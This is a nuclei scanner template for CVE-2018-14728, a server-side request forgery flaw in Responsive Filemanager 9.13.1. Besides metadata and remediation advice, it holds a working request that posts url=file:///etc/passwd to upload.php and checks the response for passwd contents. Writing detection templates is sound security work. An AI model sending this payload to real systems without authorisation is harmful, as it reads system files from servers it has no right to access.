nuclei-templates/http/cves/2018/CVE-2018-14728.yaml

41 lines
1.4 KiB
YAML

id: CVE-2018-14728
info:
name: Responsive filemanager 9.13.1 Server-Side Request Forgery
author: madrobot
severity: critical
description: Responsive filemanager 9.13.1 is susceptible to server-side request forgery in upload.php via the url parameter.
remediation: |
Upgrade to a patched version of Responsive Filemanager or apply the necessary security patches to mitigate the SSRF vulnerability.
reference:
- http://packetstormsecurity.com/files/148742/Responsive-Filemanager-9.13.1-Server-Side-Request-Forgery.html
- https://www.exploit-db.com/exploits/45103/
- https://nvd.nist.gov/vuln/detail/CVE-2018-14728
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2018-14728
cwe-id: CWE-918
epss-score: 0.96833
epss-percentile: 0.99572
cpe: cpe:2.3:a:tecrail:responsive_filemanager:9.13.1:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: tecrail
product: responsive_filemanager
tags: cve,cve2018,ssrf,lfi,packetstorm,edb,intrusive
http:
- method: POST
path:
- "{{BaseURL}}/filemanager/upload.php"
body: fldr=&url=file:///etc/passwd
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
# digest: 4b0a00483046022100e3efc16bafb949c15013580256483cb13f71db82cd0b754eb6a6c2fe6142ae4e022100bcbedfa5e4df2b8f7de42d29f3d224cc620d33ecdbe64007762860559620782d:922c64590222798bb761d5b6d8e72950